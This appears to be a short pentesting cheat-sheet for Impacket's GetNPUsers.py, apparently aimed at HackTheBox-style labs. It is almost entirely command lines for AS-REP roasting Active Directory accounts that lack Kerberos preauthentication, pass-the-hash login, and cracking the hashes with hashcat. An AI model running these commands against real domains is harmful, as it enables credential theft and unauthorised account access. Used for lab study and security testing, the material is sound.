GetNPUsers

Description

This script will attempt to list and get TGTs for those users that have the property 'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH). For those users with such configuration, a John The Ripper output will be generated so you can send it for cracking.

Usage

Request TGTs for users in a fileGet a list of users with UF_DONT_REQUIRE_PREAUTH setRequest TGT for all users

GetNPUsers.py -dc-ip 10.10.10.10 -no-pass -request -usersfile users.txt qu35t.pw/

GetNPUsers.py -dc-ip 10.10.10.10 qu35t.pw/admin:password

GetNPUsers.py -dc-ip 10.10.10.10 qu35t.pw/admin:password -request

Output

John (default)Hashcat

GetNPUsers.py -format john -dc-ip 10.10.10.10 -no-pass -usersfile users.txt qu35t.pw/

GetNPUsers.py -format hashcat -dc-ip 10.10.10.10 -no-pass -usersfile users.txt qu35t.pw/ 

Authentication

NTLM hashesNo PassUsing Kerberos

GetNPUsers.py -hashes LMHASH:NTHASH -dc-ip 10.10.10.10 qu35t.pw/svc_user

GetNPUsers.py qu35t.pw/svc_user -no-pass -dc-ip 10.10.10.10

export KRB5CCNAME=svc_user.ccache
GetNPUsers.py -k -no-pass -dc-host dc1.qu35t.pw qu35t.pw/svc_user

Hashcat Cracking

hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt

References

• Impacket Github
• Hackndo - AS_REP Roasting
• Ippsec - Tentacle
• Ippsec - Blackfield
• Ippsec - Sauna
• Ippsec - Forest